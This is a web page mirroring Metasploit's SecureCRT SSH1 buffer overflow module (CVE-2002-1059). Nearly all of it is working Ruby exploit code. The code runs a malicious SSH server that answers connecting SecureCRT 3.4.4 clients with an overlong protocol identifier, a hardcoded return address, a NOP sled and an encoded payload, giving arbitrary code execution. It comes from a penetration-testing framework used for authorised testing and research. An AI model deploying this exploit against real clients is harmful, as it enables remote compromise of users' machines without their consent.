Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ssh/securecrt_ssh1.rb
19611 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::TcpServer

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'SecureCRT SSH1 Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a buffer overflow in SecureCRT <= 4.0

18
          Beta 2. By sending a vulnerable client an overly long

19
          SSH1 protocol identifier string, it is possible to execute

20
          arbitrary code.

21


22
          This module has only been tested on SecureCRT 3.4.4.

23
        },

24
        'Author' => 'MC',

25
        'License' => MSF_LICENSE,

26
        'References' => [

27
          [ 'CVE', '2002-1059' ],

28
          [ 'OSVDB', '4991' ],

29
          [ 'BID', '5287' ],

30
        ],

31
        'DefaultOptions' => {

32
          'EXITFUNC' => 'process',

33
        },

34
        'Payload' => {

35
          'Space' => 400,

36
          'BadChars' => "\x00",

37
          'MaxNops' => 0,

38
          'StackAdjustment' => -3500,

39
        },

40
        'Platform' => 'win',

41
        'Targets' => [

42
          [ 'SecureCRT.exe (3.4.4)', { 'Ret' => 0x0041b3e0 } ],

43
        ],

44
        'Privileged' => false,

45
        'DisclosureDate' => '2002-07-23',

46
        'DefaultTarget' => 0,

47
        'Notes' => {

48
          'Reliability' => UNKNOWN_RELIABILITY,

49
          'Stability' => UNKNOWN_STABILITY,

50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

51
        }

52
      )

53
    )

54


55
    register_options(

56
      [

57
        OptPort.new('SRVPORT', [ true, "The SSH daemon port to listen on", 22 ])

58
      ]

59
    )

60
  end

61


62
  def on_client_connect(client)

63
    return if ((p = regenerate_payload(client)) == nil)

64


65
    buffer = "SSH-1.1-OpenSSH_3.6.1p2\r\n" + rand_text_english(243)

66
    buffer << [target.ret].pack('V') + make_nops(20) + payload.encoded

67


68
    print_status("Sending #{buffer.length} bytes to #{client.getpeername}:#{client.peerport}...")

69


70
    client.put(buffer)

71
    handler

72


73
    service.close_client(client)

74
  end

75
end

76


77